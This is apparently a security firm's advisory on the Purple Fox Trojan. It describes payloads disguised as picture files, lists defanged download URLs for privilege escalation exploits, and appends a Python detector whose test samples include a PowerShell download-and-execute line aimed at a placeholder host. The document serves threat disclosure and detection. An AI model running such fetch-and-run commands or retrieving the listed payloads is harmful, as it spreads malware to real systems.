Rewterz penetration testing services help organizations determine if a cyber attacker can gain access to their critical assets while giving them detailed insights of the overall business impact of a cyber attack.
Before Rewterz got its start, the market was in dire need of a specialized and dedicated information security company. It was nearly impossible for businesses to find a trustworthy provider that could truly cover all of their bases. We wanted to meet this need, giving companies across the globe a chance to get ahead while knowing that their data is in good hands.
Severity: High
The Purple Fox Trojan is being pushed to victims after an initial intrusion via SQL. The attackers then download and execute multiple malicious files, including the Purple Fox Trojan MSI installation package, privilege escalation exploits and a PowerShell script Trojan. The executed script's main function is to download and run further files that carry .jpg, .png and other picture extensions. These files are only disguised as pictures: they are in fact PowerShell script malware, Purple Fox MSI installation files and EXE privilege escalation exploits. These in turn download and run multiple privilege escalation exploits, including CVE-2018-8120, CVE-2015-1701 and MS16-032, to raise the execution permissions of the current process so that the Trojan's MSI installation file can be installed successfully.
MS16-032 download address:
hxxp://es.ldbdhm.xyz/sqlexec/1603232.jpg
CVE-2018-8120 module download addresses:
hxxp://es.ldbdhm.xyz/sqlexec/1808164.jpg
hxxp://es.ldbdhm.xyz/sqlexec/1808132.jpg
The downloaded SMB1.jpg, SMB3.jpg and Sps.jpg files are actually MSI installation packages. The download address is hxxp://Es.ldbdhm.xyz/sqlexec/xxx.jpg
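As an added example that is not part of the advisory, the following Python flags files with a picture extension whose leading bytes reveal a different format, which is the disguise technique described above; the file names, byte samples and the PowerShell keyword heuristic are constructed assumptions.

```python
# Detect files that carry a picture extension but hold an MSI, EXE or
# PowerShell payload, as in the Purple Fox delivery chain described above.
# Magic-byte signatures for the formats involved.
SIGNATURES = {
    b"\xff\xd8\xff": "jpeg",                               # genuine JPEG header
    b"\x89PNG\r\n\x1a\n": "png",                            # genuine PNG header
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1": "ole-compound",    # MSI packages are OLE CF files
    b"MZ": "pe-executable",                                 # EXE/DLL (PE) files
}

EXPECTED_FOR_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}

# PowerShell has no magic bytes; this keyword heuristic is an assumption.
PS_HINTS = ("powershell", "invoke-expression", "iex ", "downloadstring", "downloadfile")


def identify(data: bytes) -> str:
    """Return the format implied by the first bytes of data."""
    for magic, name in SIGNATURES.items():
        if data.startswith(magic):
            return name
    # Strip NULs so UTF-16 encoded scripts still hit the keyword check.
    text = data[:4096].replace(b"\x00", b"").decode("utf-8", "ignore").lower()
    if any(hint in text for hint in PS_HINTS):
        return "powershell-script"
    return "unknown"


def is_disguised(filename: str, data: bytes) -> bool:
    """True when a .jpg/.jpeg/.png file actually holds a recognised non-image format."""
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = EXPECTED_FOR_EXT.get(ext)
    kind = identify(data)
    # Unknown content is not flagged, to avoid false positives on odd but harmless images.
    return expected is not None and kind not in (expected, "unknown")


def scan(files: dict) -> list:
    """Return the names of the files in {name: bytes} that are disguised payloads."""
    return [name for name, data in files.items() if is_disguised(name, data)]


# Constructed samples: one real picture, three disguised payloads, one unreadable picture.
SAMPLES = {
    "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 12,
    "setup.jpg": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 8,   # MSI as JPEG
    "elevate.jpg": b"MZ\x90\x00" + b"\x00" * 12,                      # EXE as JPEG
    "loader.png": b"$w = New-Object Net.WebClient; IEX $w.DownloadString('hxxp://placeholder.invalid/next.jpg')",
    "odd.png": b"\x00\x01\x02\x03",
}

if __name__ == "__main__":
    print(scan(SAMPLES))  # ['setup.jpg', 'elevate.jpg', 'loader.png']
```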